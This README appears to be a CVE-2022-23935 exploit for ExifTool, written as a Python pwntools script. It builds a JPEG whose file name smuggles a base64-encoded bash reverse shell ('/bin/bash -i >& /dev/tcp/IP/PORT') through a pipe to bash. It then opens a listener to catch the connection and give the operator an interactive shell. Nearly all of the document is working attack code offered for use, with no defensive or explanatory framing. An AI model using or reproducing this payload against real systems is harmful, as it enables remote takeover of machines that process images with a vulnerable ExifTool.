README.md
Rendering markdown...
#!/usr/bin/python3
from pwn import *
import base64
import sys
class ExploitExiftools:
def __init__(self,ip,port):
self.ip = ip
self.port = port
self.p = log.progress("")
def printBanner(self):
print("""
_____ __ __ ______ ___ ___ ___ ___ ___ ____ ___ ____ _____
/ ____|\ \ / /| ____| |__ \ / _ \|__ \ |__ \ |__ \ |___ \ / _ \|___ \ | ____|
| | \ \ / / | |__ ______ ) || | | | ) | ) |______ ) | __) || (_) | __) || |__
| | \ \/ / | __||______|/ / | | | | / / / /|______|/ / |__ < \__, ||__ < |___ \
| |____ \ / | |____ / /_ | |_| |/ /_ / /_ / /_ ___) | / / ___) | ___) |
\_____| \/ |______| |____| \___/|____||____| |____||____/ /_/ |____/ |____/
by 0xFTW
""")
def generateExploit(self):
self.p.status("Generating payload ....")
cmd = bytes(f'/bin/bash -i >& /dev/tcp/{self.ip}/{self.port} 0>&1','UTF-8')
encodedName = base64.b64encode(cmd)
image = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k="
imageName = f"echo {encodedName.decode()} | base64 -d | bash |"
with open(imageName, "wb") as img:
img.write(base64.decodebytes(image))
self.p.status(f"Payload generated and saved as '{imageName}'")
def starting_listner(self):
l = listen(self.port)
conn = l.wait_for_connection()
self.p.success("Connected!!!!")
conn.interactive()
if __name__ == "__main__":
if len(sys.argv) != 3:
error(f"Usage: {sys.argv[0]} IP PORT")
if len(sys.argv) == 3:
exploit = ExploitExiftools(sys.argv[1],sys.argv[2])
exploit.printBanner()
exploit.generateExploit()
exploit.starting_listner()